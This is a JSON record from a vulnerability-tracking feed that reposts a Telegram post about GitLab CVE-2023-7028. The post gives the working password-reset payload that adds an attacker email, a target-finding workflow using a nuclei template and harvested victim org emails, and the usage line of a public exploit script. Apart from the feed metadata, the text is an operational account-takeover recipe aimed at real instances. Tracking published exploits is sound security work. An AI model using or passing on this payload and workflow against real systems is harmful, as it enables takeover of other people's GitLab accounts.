{"uuid": "87131588-3116-46c5-ba3d-a587ad4266be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-7028", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/6428", "content": "GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method.\n\nKnown POC:\nuser[email][]=valid@email.com&user[email][]=attacker@email.com\n\nIdentifying vulnerable targets:\n\n1. Utilize the nuclei template to spot exposed Gitlab Instances.\nhttps://github.com/projectdiscovery/nuclei-templates/blob/72b74d91bc48c8e7255c9974c3969684c451932a/http/exposed-panels/gitlab-detect.yaml#L20\n\n2. Hunt for potentially valid victim org emails through various sources. An effortless choice\nhttps://app.snov.io/login?name=example%5B.%5Dcom&tab=emails\n\n3. Install and execute the Python script https://github.com/RandomRobbieBF/CVE-2023-7028 on these hosts. If the target is vulnerable you'll likely receive an email on your attacker-controlled server.\n\nUsage:\n\nCVE-2023-7028.py -u URL -v victim@example.com -a attacker@grayhats.com\n\n#BugBounty #recon #bugbountytip #grayhats", "creation_timestamp": "2024-02-08T10:05:33.000000Z"}